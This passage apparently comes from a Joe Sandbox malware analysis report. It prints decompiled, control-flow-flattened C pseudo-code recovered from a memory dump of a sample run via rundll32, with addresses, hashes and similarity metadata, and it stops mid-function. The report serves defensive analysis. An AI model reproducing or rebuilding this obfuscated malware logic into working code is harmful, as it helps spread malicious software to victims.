                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C5548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                    				char _v16;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				char _v28;
                                                                                                                                    				char _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				intOrPtr _v48;
                                                                                                                                    				intOrPtr _v52;
                                                                                                                                    				intOrPtr _v56;
                                                                                                                                    				char _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				char _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				unsigned int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				void* __ecx;
                                                                                                                                    				void* _t190;
                                                                                                                                    				void* _t206;
                                                                                                                                    				void* _t208;
                                                                                                                                    				signed int _t209;
                                                                                                                                    				char* _t211;
                                                                                                                                    				signed int _t212;
                                                                                                                                    				intOrPtr _t222;
                                                                                                                                    				intOrPtr* _t225;
                                                                                                                                    				void* _t227;
                                                                                                                                    				char* _t229;
                                                                                                                                    				char _t233;
                                                                                                                                    				intOrPtr _t255;
                                                                                                                                    				intOrPtr* _t257;
                                                                                                                                    				signed int _t258;
                                                                                                                                    				signed int _t259;
                                                                                                                                    				signed int _t260;
                                                                                                                                    				signed int* _t263;
                                                                                                                                    
                                                                                                                                    				_t225 = _a16;
                                                                                                                                    				_t257 = _a4;
                                                                                                                                    				_push(_t225);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_t257);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(_t190);
                                                                                                                                    				_v56 = 0xb9e7cb;
                                                                                                                                    				_t255 = 0;
                                                                                                                                    				_v52 = 0x6e87b5;
                                                                                                                                    				_t263 =  &(( &_v148)[6]);
                                                                                                                                    				_v48 = 0;
                                                                                                                                    				_v44 = 0;
                                                                                                                                    				_t227 = 0x3ccc1e9;
                                                                                                                                    				_v128 = 0x85629b;
                                                                                                                                    				_t258 = 0x62;
                                                                                                                                    				_v128 = _v128 * 0x5a;
                                                                                                                                    				_v128 = _v128 + 0xfbaf;
                                                                                                                                    				_v128 = _v128 ^ 0x2ee5a62d;
                                                                                                                                    				_v144 = 0xfc0c7f;
                                                                                                                                    				_v144 = _v144 ^ 0xfdfaf442;
                                                                                                                                    				_v144 = _v144 >> 1;
                                                                                                                                    				_v144 = _v144 | 0x14143ad1;
                                                                                                                                    				_v144 = _v144 ^ 0x7e977ecf;
                                                                                                                                    				_v96 = 0xd1f565;
                                                                                                                                    				_v96 = _v96 * 0x21;
                                                                                                                                    				_v96 = _v96 ^ 0x1b12de47;
                                                                                                                                    				_v104 = 0xb219e8;
                                                                                                                                    				_v104 = _v104 | 0x75a31cc8;
                                                                                                                                    				_v104 = _v104 ^ 0x75be6df4;
                                                                                                                                    				_v80 = 0x6fb9b6;
                                                                                                                                    				_v80 = _v80 * 0x3e;
                                                                                                                                    				_v80 = _v80 ^ 0x1b001c4a;
                                                                                                                                    				_v132 = 0x1154a0;
                                                                                                                                    				_v132 = _v132 << 0xb;
                                                                                                                                    				_v132 = _v132 + 0xfffffde8;
                                                                                                                                    				_v132 = _v132 | 0xd1d436bb;
                                                                                                                                    				_v132 = _v132 ^ 0xdbfeae5a;
                                                                                                                                    				_v76 = 0x5374cd;
                                                                                                                                    				_v76 = _v76 << 2;
                                                                                                                                    				_v76 = _v76 ^ 0x0147cb67;
                                                                                                                                    				_v140 = 0x35e68a;
                                                                                                                                    				_v140 = _v140 + 0xffff467d;
                                                                                                                                    				_v140 = _v140 * 0x7c;
                                                                                                                                    				_v140 = _v140 ^ 0x566bba39;
                                                                                                                                    				_v140 = _v140 ^ 0x4faa8078;
                                                                                                                                    				_v124 = 0xf91357;
                                                                                                                                    				_v124 = _v124 << 0xf;
                                                                                                                                    				_v124 = _v124 + 0xf2e4;
                                                                                                                                    				_v124 = _v124 ^ 0x89afe8a4;
                                                                                                                                    				_v112 = 0xf055e4;
                                                                                                                                    				_v112 = _v112 ^ 0x101963ca;
                                                                                                                                    				_v112 = _v112 | 0x7be8ad21;
                                                                                                                                    				_v112 = _v112 ^ 0x7be17431;
                                                                                                                                    				_v84 = 0x17393b;
                                                                                                                                    				_v84 = _v84 << 6;
                                                                                                                                    				_v84 = _v84 ^ 0x05c81c43;
                                                                                                                                    				_v120 = 0xf688ab;
                                                                                                                                    				_v120 = _v120 / _t258;
                                                                                                                                    				_v120 = _v120 * 0x2d;
                                                                                                                                    				_v120 = _v120 ^ 0x00718a36;
                                                                                                                                    				_v116 = 0xa21f51;
                                                                                                                                    				_v116 = _v116 + 0x3c3b;
                                                                                                                                    				_v116 = _v116 >> 0xa;
                                                                                                                                    				_v116 = _v116 ^ 0x0006c391;
                                                                                                                                    				_v88 = 0x51e239;
                                                                                                                                    				_v88 = _v88 + 0x2ec0;
                                                                                                                                    				_v88 = _v88 ^ 0x0058dd2b;
                                                                                                                                    				_v136 = 0xa92d92;
                                                                                                                                    				_v136 = _v136 >> 0xd;
                                                                                                                                    				_v136 = _v136 ^ 0x0647b396;
                                                                                                                                    				_v136 = _v136 ^ 0x20b7ff2f;
                                                                                                                                    				_v136 = _v136 ^ 0x26fd7475;
                                                                                                                                    				_v108 = 0xb50576;
                                                                                                                                    				_t259 = 0x45;
                                                                                                                                    				_v108 = _v108 / _t259;
                                                                                                                                    				_v108 = _v108 ^ 0xb94dc178;
                                                                                                                                    				_v108 = _v108 ^ 0xb943792d;
                                                                                                                                    				_v148 = 0xb9b260;
                                                                                                                                    				_t260 = 0x14;
                                                                                                                                    				_v148 = _v148 / _t260;
                                                                                                                                    				_v148 = _v148 * 0x3f;
                                                                                                                                    				_v148 = _v148 >> 2;
                                                                                                                                    				_v148 = _v148 ^ 0x009e914b;
                                                                                                                                    				_v92 = 0x6e7d65;
                                                                                                                                    				_v92 = _v92 | 0xb573042f;
                                                                                                                                    				_v92 = _v92 ^ 0xb570b7bc;
                                                                                                                                    				_v100 = 0xfd8f7e;
                                                                                                                                    				_v100 = _v100 * 0x5d;
                                                                                                                                    				_v100 = _v100 ^ 0x5c1db3f3;
                                                                                                                                    				L1:
                                                                                                                                    				while(_t227 != 0x3c16ad4) {
                                                                                                                                    					if(_t227 == 0x3ccc1e9) {
                                                                                                                                    						_t227 = 0x7dbf5b4;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t227 == 0x79abc1a) {
                                                                                                                                    						_t229 =  &_v28;
                                                                                                                                    						_t208 = E002CAEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
                                                                                                                                    						_t263 =  &(_t263[4]);
                                                                                                                                    						if(_t208 != 0) {
                                                                                                                                    							_push(_t229);
                                                                                                                                    							_push(_t229);
                                                                                                                                    							_t222 = E002C7FF2(_v24);
                                                                                                                                    							 *_t257 = _t222;
                                                                                                                                    							if(_t222 != 0) {
                                                                                                                                    								E002CED7E(_v108,  *_t257, _v148, _v28, _v24);
                                                                                                                                    								_t263 =  &(_t263[3]);
                                                                                                                                    								 *((intOrPtr*)(_t257 + 4)) = _v24;
                                                                                                                                    								_t255 = 1;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t227 = 0xdaef9d5;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t227 == 0x7dbf5b4) {
                                                                                                                                    						_t209 =  *((intOrPtr*)(_t225 + 4));
                                                                                                                                    						_t233 =  *_t225;
                                                                                                                                    						_v68 = _t209;
                                                                                                                                    						_v72 = _t233;
                                                                                                                                    						_t211 = _t209 - 1 + _t233;
                                                                                                                                    						while(_t211 > _t233) {
                                                                                                                                    							if( *_t211 == 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t211 = _t211 - 1;
                                                                                                                                    						}
                                                                                                                                    						_t212 = _t211 - _t233;
                                                                                                                                    						_v68 = _t212;
                                                                                                                                    						if(_t212 == 0) {
                                                                                                                                    							L16:
                                                                                                                                    							_t227 = 0xfc35b14;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						while(_v68 % _v144 != _v128) {
                                                                                                                                    							_t163 =  &_v68;
                                                                                                                                    							 *_t163 = _v68 - 1;
                                                                                                                                    							if( *_t163 != 0) {
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							goto L16;
                                                                                                                                    						}
                                                                                                                                    						goto L16;
                                                                                                                                    					}
                                                                                                                                    					if(_t227 == 0xdaef9d5) {
                                                                                                                                    						E002D8519(_v92, _v100, _v64);
                                                                                                                                    						L28:
                                                                                                                                    						return _t255;
                                                                                                                                    					}
                                                                                                                                    					if(_t227 != 0xfc35b14) {
                                                                                                                                    						L25:
                                                                                                                                    						if(_t227 != 0xb843ed5) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L28;
                                                                                                                                    					}
                                                                                                                                    					if(E002C5E60( &_v72, _v96, _v104,  &_v64) == 0) {
                                                                                                                                    						goto L28;
                                                                                                                                    					}
                                                                                                                                    					_t227 = 0x3c16ad4;
                                                                                                                                    				}
                                                                                                                                    				_t206 = E002C8B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
                                                                                                                                    				_t263 =  &(_t263[4]);
                                                                                                                                    				if(_t206 == 0) {
                                                                                                                                    					_t227 = 0xdaef9d5;
                                                                                                                                    					goto L25;
                                                                                                                                    				}
                                                                                                                                    				_t227 = 0x79abc1a;
                                                                                                                                    				goto L1;
                                                                                                                                    			}

                                                                                                                                    0x002c57d6
                                                                                                                                    0x002c57e3
                                                                                                                                    0x002c57e7
                                                                                                                                    0x00000000
                                                                                                                                    0x002c57ef
                                                                                                                                    0x002c5801
                                                                                                                                    0x002c591d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c591d
                                                                                                                                    0x002c580d
                                                                                                                                    0x002c58ac
                                                                                                                                    0x002c58bb
                                                                                                                                    0x002c58c0
                                                                                                                                    0x002c58c5
                                                                                                                                    0x002c58da
                                                                                                                                    0x002c58db
                                                                                                                                    0x002c58dc
                                                                                                                                    0x002c58e1
                                                                                                                                    0x002c58e7
                                                                                                                                    0x002c5901
                                                                                                                                    0x002c590f
                                                                                                                                    0x002c5912
                                                                                                                                    0x002c5915
                                                                                                                                    0x002c5915
                                                                                                                                    0x002c58e7
                                                                                                                                    0x002c5916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5916
                                                                                                                                    0x002c5819
                                                                                                                                    0x002c5856
                                                                                                                                    0x002c5859
                                                                                                                                    0x002c585b
                                                                                                                                    0x002c5860
                                                                                                                                    0x002c5864
                                                                                                                                    0x002c586e
                                                                                                                                    0x002c586b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c586d
                                                                                                                                    0x002c586d
                                                                                                                                    0x002c5872
                                                                                                                                    0x002c5874
                                                                                                                                    0x002c5878
                                                                                                                                    0x002c5892
                                                                                                                                    0x002c5892
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5892
                                                                                                                                    0x002c587a
                                                                                                                                    0x002c588c
                                                                                                                                    0x002c588c
                                                                                                                                    0x002c5890
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5890
                                                                                                                                    0x00000000
                                                                                                                                    0x002c587a
                                                                                                                                    0x002c581d
                                                                                                                                    0x002c5975
                                                                                                                                    0x002c597b
                                                                                                                                    0x002c5987
                                                                                                                                    0x002c5987
                                                                                                                                    0x002c5829
                                                                                                                                    0x002c595b
                                                                                                                                    0x002c5961
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5967
                                                                                                                                    0x002c5849
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c584f
                                                                                                                                    0x002c584f
                                                                                                                                    0x002c5943
                                                                                                                                    0x002c5948
                                                                                                                                    0x002c594d
                                                                                                                                    0x002c5959
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5959
                                                                                                                                    0x002c594f
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1t{$9Q$;<$e}n
                                                                                                                                    • API String ID: 0-2095593254
                                                                                                                                    • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                    • Instruction ID: 24baf32b704bc11484a559b229d801cf45b742eeb1593c7a65185def03046be3
                                                                                                                                    • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                    • Instruction Fuzzy Hash: 75B140B11183828FC328CF21C585A1BFBE1FBD4748F508A1DF29686260D7B1DA89CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002D7DD5() {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				signed int _v1044;
                                                                                                                                    				signed int _v1048;
                                                                                                                                    				intOrPtr _v1052;
                                                                                                                                    				intOrPtr _v1056;
                                                                                                                                    				unsigned int _v1060;
                                                                                                                                    				signed int _v1064;
                                                                                                                                    				signed int _v1068;
                                                                                                                                    				signed int _v1072;
                                                                                                                                    				signed int _v1076;
                                                                                                                                    				signed int _v1080;
                                                                                                                                    				signed int _v1084;
                                                                                                                                    				signed int _v1088;
                                                                                                                                    				signed int _v1092;
                                                                                                                                    				signed int _v1096;
                                                                                                                                    				signed int _v1100;
                                                                                                                                    				signed int _v1104;
                                                                                                                                    				signed int _v1108;
                                                                                                                                    				signed int _v1112;
                                                                                                                                    				signed int _v1116;
                                                                                                                                    				signed int _v1120;
                                                                                                                                    				signed int _v1124;
                                                                                                                                    				signed int _v1128;
                                                                                                                                    				signed int _v1132;
                                                                                                                                    				signed int _v1136;
                                                                                                                                    				signed int _v1140;
                                                                                                                                    				signed int _v1144;
                                                                                                                                    				signed int _v1148;
                                                                                                                                    				signed int _v1152;
                                                                                                                                    				signed int _v1156;
                                                                                                                                    				intOrPtr _t236;
                                                                                                                                    				void* _t241;
                                                                                                                                    				short* _t244;
                                                                                                                                    				void* _t247;
                                                                                                                                    				void* _t250;
                                                                                                                                    				intOrPtr _t256;
                                                                                                                                    				intOrPtr _t272;
                                                                                                                                    				signed int _t278;
                                                                                                                                    				signed int _t279;
                                                                                                                                    				signed int _t280;
                                                                                                                                    				signed int* _t283;
                                                                                                                                    
                                                                                                                                    				_t283 =  &_v1156;
                                                                                                                                    				_v1048 = _v1048 & 0x00000000;
                                                                                                                                    				_v1044 = _v1044 & 0x00000000;
                                                                                                                                    				_t250 = 0x1242b9;
                                                                                                                                    				_v1056 = 0xc74a30;
                                                                                                                                    				_v1052 = 0xdc93e6;
                                                                                                                                    				_v1140 = 0x94ae82;
                                                                                                                                    				_v1140 = _v1140 * 0x5d;
                                                                                                                                    				_v1140 = _v1140 | 0xd08f5b59;
                                                                                                                                    				_t278 = 0x3b;
                                                                                                                                    				_v1140 = _v1140 / _t278;
                                                                                                                                    				_v1140 = _v1140 ^ 0x042b78b4;
                                                                                                                                    				_v1060 = 0xf2c7d8;
                                                                                                                                    				_v1060 = _v1060 >> 0xe;
                                                                                                                                    				_v1060 = _v1060 ^ 0x000b32e4;
                                                                                                                                    				_v1084 = 0xadf7c1;
                                                                                                                                    				_v1084 = _v1084 >> 7;
                                                                                                                                    				_v1084 = _v1084 ^ 0x0005ae79;
                                                                                                                                    				_v1068 = 0x4ca2f2;
                                                                                                                                    				_v1068 = _v1068 | 0x7f3e9315;
                                                                                                                                    				_v1068 = _v1068 ^ 0x7f77e091;
                                                                                                                                    				_v1148 = 0xfaa01c;
                                                                                                                                    				_v1148 = _v1148 | 0x0a84fcb5;
                                                                                                                                    				_t279 = 0x3d;
                                                                                                                                    				_v1148 = _v1148 / _t279;
                                                                                                                                    				_v1148 = _v1148 + 0xffff92ee;
                                                                                                                                    				_v1148 = _v1148 ^ 0x0020489e;
                                                                                                                                    				_v1104 = 0xbd50a4;
                                                                                                                                    				_v1104 = _v1104 | 0x802f8c80;
                                                                                                                                    				_v1104 = _v1104 ^ 0xe2a4d8db;
                                                                                                                                    				_v1104 = _v1104 ^ 0x621899e9;
                                                                                                                                    				_v1096 = 0x4ec4a;
                                                                                                                                    				_t280 = 0x27;
                                                                                                                                    				_v1096 = _v1096 / _t280;
                                                                                                                                    				_v1096 = _v1096 ^ 0x000ca7f0;
                                                                                                                                    				_v1156 = 0x496e13;
                                                                                                                                    				_v1156 = _v1156 << 0xb;
                                                                                                                                    				_v1156 = _v1156 + 0xffff34c4;
                                                                                                                                    				_v1156 = _v1156 ^ 0xea67072b;
                                                                                                                                    				_v1156 = _v1156 ^ 0xa10c07e0;
                                                                                                                                    				_v1132 = 0x5417d7;
                                                                                                                                    				_v1132 = _v1132 ^ 0x2d0a29d3;
                                                                                                                                    				_v1132 = _v1132 * 0x11;
                                                                                                                                    				_v1132 = _v1132 ^ 0x95d68b4c;
                                                                                                                                    				_v1132 = _v1132 ^ 0x969bce68;
                                                                                                                                    				_v1108 = 0x3d434d;
                                                                                                                                    				_t83 =  &_v1108; // 0x3d434d
                                                                                                                                    				_v1108 =  *_t83 * 0x5d;
                                                                                                                                    				_v1108 = _v1108 + 0xbd1d;
                                                                                                                                    				_v1108 = _v1108 ^ 0x16426462;
                                                                                                                                    				_v1064 = 0x905f90;
                                                                                                                                    				_v1064 = _v1064 << 7;
                                                                                                                                    				_v1064 = _v1064 ^ 0x482aff2b;
                                                                                                                                    				_v1076 = 0xa70fe8;
                                                                                                                                    				_v1076 = _v1076 ^ 0x0f6696b3;
                                                                                                                                    				_v1076 = _v1076 ^ 0x0fce7292;
                                                                                                                                    				_v1144 = 0x5add64;
                                                                                                                                    				_v1144 = _v1144 * 0x72;
                                                                                                                                    				_v1144 = _v1144 >> 2;
                                                                                                                                    				_v1144 = _v1144 + 0xffffbbe0;
                                                                                                                                    				_v1144 = _v1144 ^ 0x0a105df6;
                                                                                                                                    				_v1112 = 0xa934e1;
                                                                                                                                    				_v1112 = _v1112 + 0xffff3dc6;
                                                                                                                                    				_v1112 = _v1112 ^ 0xf71e7087;
                                                                                                                                    				_v1112 = _v1112 ^ 0xf7bbdd65;
                                                                                                                                    				_v1152 = 0xfe7bab;
                                                                                                                                    				_v1152 = _v1152 + 0xffffe121;
                                                                                                                                    				_v1152 = _v1152 << 7;
                                                                                                                                    				_v1152 = _v1152 + 0xffffae88;
                                                                                                                                    				_v1152 = _v1152 ^ 0x7f211c18;
                                                                                                                                    				_v1092 = 0x242707;
                                                                                                                                    				_v1092 = _v1092 >> 6;
                                                                                                                                    				_v1092 = _v1092 ^ 0x0003c6d8;
                                                                                                                                    				_v1136 = 0xebac4f;
                                                                                                                                    				_v1136 = _v1136 + 0x4c15;
                                                                                                                                    				_v1136 = _v1136 >> 0xf;
                                                                                                                                    				_v1136 = _v1136 ^ 0xdf38e0e8;
                                                                                                                                    				_v1136 = _v1136 ^ 0xdf3b1dfc;
                                                                                                                                    				_v1120 = 0x4eb7ab;
                                                                                                                                    				_v1120 = _v1120 << 2;
                                                                                                                                    				_v1120 = _v1120 + 0xffff85cc;
                                                                                                                                    				_v1120 = _v1120 ^ 0x01347c50;
                                                                                                                                    				_v1088 = 0xc2f923;
                                                                                                                                    				_v1088 = _v1088 * 0xf;
                                                                                                                                    				_v1088 = _v1088 ^ 0x0b6c1f22;
                                                                                                                                    				_v1080 = 0xbf02c1;
                                                                                                                                    				_v1080 = _v1080 + 0xffffcd4c;
                                                                                                                                    				_v1080 = _v1080 ^ 0x00bd8b7d;
                                                                                                                                    				_v1128 = 0xfef10;
                                                                                                                                    				_v1128 = _v1128 + 0xfa25;
                                                                                                                                    				_v1128 = _v1128 + 0xffffb342;
                                                                                                                                    				_v1128 = _v1128 + 0x2fe7;
                                                                                                                                    				_v1128 = _v1128 ^ 0x00107547;
                                                                                                                                    				_v1116 = 0x30091d;
                                                                                                                                    				_v1116 = _v1116 | 0x682f5e67;
                                                                                                                                    				_v1116 = _v1116 * 0xf;
                                                                                                                                    				_v1116 = _v1116 ^ 0x1bb1960a;
                                                                                                                                    				_v1100 = 0xdd7fbe;
                                                                                                                                    				_v1100 = _v1100 >> 0xf;
                                                                                                                                    				_v1100 = _v1100 + 0xffff26d4;
                                                                                                                                    				_v1100 = _v1100 ^ 0xfff0a895;
                                                                                                                                    				_v1072 = 0xd8d782;
                                                                                                                                    				_v1072 = _v1072 + 0xffff857d;
                                                                                                                                    				_v1072 = _v1072 ^ 0x00daabd2;
                                                                                                                                    				_v1124 = 0x615b7c;
                                                                                                                                    				_v1124 = _v1124 >> 0x10;
                                                                                                                                    				_v1124 = _v1124 * 0x3d;
                                                                                                                                    				_v1124 = _v1124 ^ 0x000147a1;
                                                                                                                                    				L1:
                                                                                                                                    				while(_t250 != 0x1242b9) {
                                                                                                                                    					if(_t250 == 0x56337fc) {
                                                                                                                                    						E002D6C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
                                                                                                                                    						_push(_v1088);
                                                                                                                                    						_push( &_v520);
                                                                                                                                    						_push(_v1120);
                                                                                                                                    						E002E13AD(_v1136,  &_v1040, __eflags);
                                                                                                                                    						_t283 =  &(_t283[6]);
                                                                                                                                    						_t250 = 0x8d6676f;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t250 == 0x5f94146) {
                                                                                                                                    						_push(_v1148);
                                                                                                                                    						_push(_v1068);
                                                                                                                                    						_t241 = E002DDCF7(_v1084, 0x2c1000, __eflags);
                                                                                                                                    						_t256 =  *0x2e3e10; // 0x0
                                                                                                                                    						_t272 =  *0x2e3e10; // 0x0
                                                                                                                                    						E002C47CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
                                                                                                                                    						E002CA8B0(_v1064, _t241, _v1076);
                                                                                                                                    						_t283 =  &(_t283[9]);
                                                                                                                                    						_t250 = 0x56337fc;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t250 == 0x8d6676f) {
                                                                                                                                    						_t244 = E002CB6CF( &_v1040, _v1080, _v1128, _v1116);
                                                                                                                                    						__eflags = 0;
                                                                                                                                    						 *_t244 = 0;
                                                                                                                                    						return E002CB1C6( &_v1040, _v1100, _v1072, _v1124);
                                                                                                                                    					}
                                                                                                                                    					if(_t250 == 0xbcbde3e) {
                                                                                                                                    						_t247 = E002D473C();
                                                                                                                                    						L8:
                                                                                                                                    						_t250 = 0x5f94146;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t250 != 0xf4317dc) {
                                                                                                                                    						L15:
                                                                                                                                    						__eflags = _t250 - 0xfb0317f;
                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						return _t247;
                                                                                                                                    					}
                                                                                                                                    					_t247 = E002C3E3F();
                                                                                                                                    					goto L8;
                                                                                                                                    				}
                                                                                                                                    				_t236 =  *0x2e3e10; // 0x0
                                                                                                                                    				__eflags =  *((intOrPtr*)(_t236 + 0x450));
                                                                                                                                    				if(__eflags == 0) {
                                                                                                                                    					_t250 = 0xf4317dc;
                                                                                                                                    					goto L15;
                                                                                                                                    				}
                                                                                                                                    				_t250 = 0xbcbde3e;
                                                                                                                                    				goto L1;
                                                                                                                                    			}
                                                                                                                                    0x002d81f5
                                                                                                                                    0x002d8200
                                                                                                                                    0x002d8201
                                                                                                                                    0x002d8210
                                                                                                                                    0x002d8215
                                                                                                                                    0x002d8218
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8218
                                                                                                                                    0x002d8132
                                                                                                                                    0x002d8164
                                                                                                                                    0x002d816d
                                                                                                                                    0x002d8175
                                                                                                                                    0x002d8186
                                                                                                                                    0x002d819e
                                                                                                                                    0x002d81b1
                                                                                                                                    0x002d81c6
                                                                                                                                    0x002d81cb
                                                                                                                                    0x002d81ce
                                                                                                                                    0x00000000
                                                                                                                                    0x002d81ce
                                                                                                                                    0x002d813a
                                                                                                                                    0x002d825a
                                                                                                                                    0x002d8263
                                                                                                                                    0x002d826d
                                                                                                                                    0x00000000
                                                                                                                                    0x002d827c
                                                                                                                                    0x002d8142
                                                                                                                                    0x002d815d
                                                                                                                                    0x002d8155
                                                                                                                                    0x002d8155
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8155
                                                                                                                                    0x002d8146
                                                                                                                                    0x002d8239
                                                                                                                                    0x002d8239
                                                                                                                                    0x002d823f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d823f
                                                                                                                                    0x002d8150
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8150
                                                                                                                                    0x002d8222
                                                                                                                                    0x002d8227
                                                                                                                                    0x002d822e
                                                                                                                                    0x002d8237
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8237
                                                                                                                                    0x002d8230
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: MC=$g^/h$|[a$/
                                                                                                                                    • API String ID: 0-1545830693
                                                                                                                                    • Opcode ID: 98ea5c7fcc764b070793d7382a3381be06df9c261a8073fa29c1cd7532a6a8b0
                                                                                                                                    • Instruction ID: c43b45350fa33f05b793673594eeb3348ec13bf7eeb2adcd10e3f7bdf7c9bcd6
                                                                                                                                    • Opcode Fuzzy Hash: 98ea5c7fcc764b070793d7382a3381be06df9c261a8073fa29c1cd7532a6a8b0
                                                                                                                                    • Instruction Fuzzy Hash: 20C11FB11183818FC368CF26C58A91BFBF1FBC0758F508A1EF19656260D7B58A1ACF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002DA2E8(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				char _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				intOrPtr _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				intOrPtr _t184;
                                                                                                                                    				intOrPtr* _t189;
                                                                                                                                    				intOrPtr _t193;
                                                                                                                                    				intOrPtr _t196;
                                                                                                                                    				intOrPtr _t197;
                                                                                                                                    				intOrPtr _t198;
                                                                                                                                    				intOrPtr _t204;
                                                                                                                                    				intOrPtr _t205;
                                                                                                                                    				signed int _t223;
                                                                                                                                    				signed int _t224;
                                                                                                                                    				signed int _t225;
                                                                                                                                    				intOrPtr _t226;
                                                                                                                                    				void* _t228;
                                                                                                                                    				signed int _t229;
                                                                                                                                    				intOrPtr _t230;
                                                                                                                                    				signed int* _t231;
                                                                                                                                    
                                                                                                                                    				_t198 = __ecx;
                                                                                                                                    				_t231 =  &_v92;
                                                                                                                                    				_v8 = __edx;
                                                                                                                                    				_v24 = __ecx;
                                                                                                                                    				_v28 = 0x24c7b9;
                                                                                                                                    				_v28 = _v28 << 9;
                                                                                                                                    				_v28 = _v28 ^ 0x498f7200;
                                                                                                                                    				_v76 = 0x5897f7;
                                                                                                                                    				_v76 = _v76 + 0xffffedf4;
